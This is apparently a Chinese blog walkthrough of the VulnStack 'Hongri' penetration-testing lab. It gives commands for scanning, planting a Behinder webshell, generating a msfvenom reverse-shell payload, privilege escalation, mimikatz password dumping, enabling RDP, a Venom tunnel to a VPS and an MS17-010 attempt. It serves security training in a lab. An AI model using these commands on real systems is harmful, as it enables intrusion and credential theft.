admin 管理员组

文章数量: 887021

红日

红日-VulnStack靶场

注:此文章仅限于安全研究和教学,用户因阅读此文章而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!

环境搭建

下载地址

/

首先创建一块仅主机的网卡,修改地址为192.168.52.0/24段ip
win7未边界
双网卡
net,ip为192.168.25.137
仅主机,仅主机网卡地址为192.168.52.143
windows server 2008
单网卡,仅主机,仅主机网卡地址为192.168.52.138
windows 2003
单网卡,仅主机,仅主机网卡地址为192.168.52.141

kali服务器
网卡net,ip为192.168.25.132

开始攻击


判断192.168.25.137为目标ip。对其进行端口扫描

 nmap -sV -p- 192.168.25.137


发现80,135,3306,对80端口发起访问


该端口为phpstudy探针页面,可以查看到敏感信息,如绝对路径,对其进行目录扫描

python3 dirmap.py -i http://192.168.25.137/ -lcf						//dirmap工具
python3 dirsearch.py -u http://192.168.25.137/ -x 301,400,404,403				//dirsearch工具


首先下载beifen.rar,然后访问phpmyadmin页面


解压后查看

发现yxcms同时在data中发现账号密码

对其进行登录

查找getshell方式


对其进行getshell

这不得安排一个冰蝎上去?

安排

那我们就要找找shell在哪里了然后需要抓包了

发现Mname参数我们修改下

C:\phpStudy\WWW\yxcms\protected\apps/default/view/aaa/aaa.php			//报错了目录不对
C:\phpStudy\WWW\yxcms\protected\apps/default/view/default						//这样就是对的?

嗯哼?

上线
接下来就要让他上线了
使用msfconsole生成木马,运行上线

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<监听ip> LPORT=<监听端口> -f exe -o 123.exe	   //生成exemsfconsole    //启动msfuse exploit/multi/handler 			//进入模块
set payload windows/meterpreter/reverse_tcp	//设置payload
set LHOST				//设置监听主机set LPoRT				//设置监听端口exploit						//运行


通过冰蝎将生成的123.exe上传至服务器,并运行


上线成功

进行提权

getuid					//查看服务器权限
getsystem 			//提权
getuid 					//查看是否提权成功


将本地mimikatz上传

upload /root/work/mimikatz2.2-x64/mimikatz.exe		//为自己的目录
ls			//查看是否上传成功



运行抓取密码

execute -i -f mimikatz.exe			//进入交互页面
然后执行
privilege::debug
sekurlsa::logonpasswords



其中获取到明文密码

在这里开启rdp
run post/windows/manage/enable_rdp

然后我们搭建代理隧道
这里使用的工具为venom-master

./admin_linux_x64 -lport 7777			//vps开启监听
agent.exe -rhost 43.143.128.119 -rport 7777					//客户端进行连接


在admin节点开启转发

然后在本地设置代理这里使用的是v2ray添加socks服务器

然后选择活动服务器,开启代理
这里需要注意看下靶机,有可能cpu爆满,导致隧道卡掉。
然后进行入节点获取shell进行扫描,这里换了地址换成了192.168.1.222



接下来我们对他的内网网段进行扫描,发现其他主机这里使用fscan,也可以使用arp -a来查看arp表
使用冰蝎上传fsacn
然后进行扫描

fscan.exe -h 192.168.52.0/24					//扫描



在kali服务器中也配置socks 代理

测试proxychains联通性

kali使用msfconsole中的相关模块进行攻击

proxychains4 msfconsole						//通过proxychamis4 启动msfconsole
use auxiliary/scanner/smb/smb_ms17_010 			//验证192.168.52.141是否存在ms17_010
set RHOSTS 192.168.52.141									//设置目标
run																			//运行use	1								//使用第一个模块
set RHOSTS 192.168.52.141	
run





同时可以使用

rdesktop -d GOD -u <抓到的用户> -p<抓到的密码>  192.168.52.143:3389						//对其进行登录


但是这里我的ms17_010没有攻击成功所以后面的步骤无法进行,按照思路的话,使用ms17_010攻击成功后可以拿到权限,进行权限提升
如果大家觉得这篇有点水的话推荐大佬链接,搭大家可以看下


本文标签: 红日